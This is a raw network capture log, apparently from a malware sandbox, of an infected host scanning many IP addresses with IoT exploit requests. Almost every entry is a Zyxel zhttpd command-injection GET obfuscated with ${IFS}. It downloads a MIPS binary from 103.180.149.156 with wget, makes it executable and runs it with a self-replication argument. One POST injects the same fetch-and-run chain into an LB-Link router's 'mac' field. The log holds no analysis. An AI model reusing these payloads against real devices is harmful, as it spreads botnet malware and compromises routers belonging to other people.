                                                        Feb 2, 2024 06:21:28.304846048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9043192.168.2.1457228151.168.123.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304886103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9044192.168.2.1441438211.24.80.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304935932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9045192.168.2.145543295.125.236.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.304974079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9046192.168.2.144531867.68.151.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305012941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9047192.168.2.1446764164.89.66.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305047035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9048192.168.2.1453012218.69.206.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305072069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9049192.168.2.143868439.32.205.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305140972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9050192.168.2.1453210146.169.182.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305172920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9051192.168.2.1454088201.159.74.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305212021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9052192.168.2.145884618.249.153.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305233955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9053192.168.2.1449064201.72.149.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305286884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9054192.168.2.1456890115.86.15.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305325985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9055192.168.2.1436356116.212.38.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305371046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9056192.168.2.1456374184.251.105.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305402040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9057192.168.2.1452974165.153.244.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305427074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9058192.168.2.145017046.86.204.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305475950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9059192.168.2.1446638220.21.94.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305507898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9060192.168.2.1444510166.207.213.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305546045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9061192.168.2.1433412142.82.205.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305581093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9062192.168.2.1448478109.250.27.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305620909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9063192.168.2.143580019.187.202.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305656910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9064192.168.2.1459364139.20.27.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305689096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9065192.168.2.1439066201.76.71.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305748940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9066192.168.2.145337417.215.107.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305789948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9067192.168.2.1451496159.62.91.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305789948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9068192.168.2.14603964.16.21.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305823088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9069192.168.2.1450160157.136.85.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305876970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9070192.168.2.145409023.242.252.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305905104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9071192.168.2.1434784211.93.230.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305979013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9072192.168.2.143614465.42.223.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.305989027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9073192.168.2.1448152171.237.122.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306041002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9074192.168.2.1446846173.20.148.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306075096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9075192.168.2.143399034.232.172.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306106091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9076192.168.2.1435172155.82.253.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306160927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9077192.168.2.1451036132.58.185.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306195021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9078192.168.2.1455636191.90.211.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306216002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9079192.168.2.1453858129.15.54.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306255102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9080192.168.2.144614878.212.253.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306297064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9081192.168.2.145318098.137.129.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306351900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9082192.168.2.145337087.188.197.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306389093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9083192.168.2.144756812.168.210.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306421041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9084192.168.2.1444682150.184.42.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306459904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9085192.168.2.1438902137.141.157.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306504011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9086192.168.2.1458248192.64.185.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306545019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9087192.168.2.1442784153.146.58.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306576014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9088192.168.2.1433104134.32.196.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.306597948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9089192.168.2.145824445.131.7.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.118894100 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:29.235687971 CET328INHTTP/1.1 400 Bad Request
                                                        Server: cloudflare
                                                        Date: Fri, 02 Feb 2024 05:21:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        CF-RAY: -
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9090192.168.2.1446324120.98.51.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.317913055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9091192.168.2.14577724.50.78.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.317943096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9092192.168.2.14335224.182.193.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318048954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9093192.168.2.1433638110.188.221.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318084002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9094192.168.2.145115268.61.128.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318120956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9095192.168.2.145450612.42.179.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318181038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9096192.168.2.145427846.193.128.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318207979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9097192.168.2.1460916146.15.49.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318254948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9098192.168.2.1453042119.238.62.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318272114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9099192.168.2.1445028194.178.45.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318310976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9100192.168.2.1457234141.112.159.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318341970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
